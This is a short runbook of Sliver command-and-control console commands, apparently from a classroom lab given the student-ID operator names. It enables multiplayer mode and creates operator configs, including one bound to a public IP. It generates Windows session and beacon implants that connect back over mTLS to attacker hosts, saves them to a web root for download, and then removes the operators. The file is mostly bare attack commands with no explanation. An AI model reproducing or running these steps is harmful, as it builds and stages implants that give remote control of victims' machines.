// active multiplayers mode
multiplayer

// create config file
new-operator --name 20120083 --lhost localhost --lport 31337 --save /home/kali/.sliver-client/configs
new-operator --name 20120083 --lhost 18.143.102.216 --lport 31337 --save ../client_config/20120083.cfg

mv ./tools/client_config/20120083_client.cfg /home/kali/.sliver-client/configs

// create implant sessions
generate --mtls 192.168.216.14 --os windows --arch amd64 --format exe --save /var/www/html/sessions
beacon --mtls 192.168.122.14:8080 --os windows --arch amd64 --format exe --save /var/www/html/beacons --seconds 5 --jitter 3

new-operator --name huhu --lhost localhost --lport 31337 --save /home/kali/.sliver-client/configs

20120078
20120083
20120116
20120176
20120313

kick-operator -n 20120078
kick-operator -n 20120083
kick-operator -n 20120116
kick-operator -n 20120176
kick-operator -n 20120313
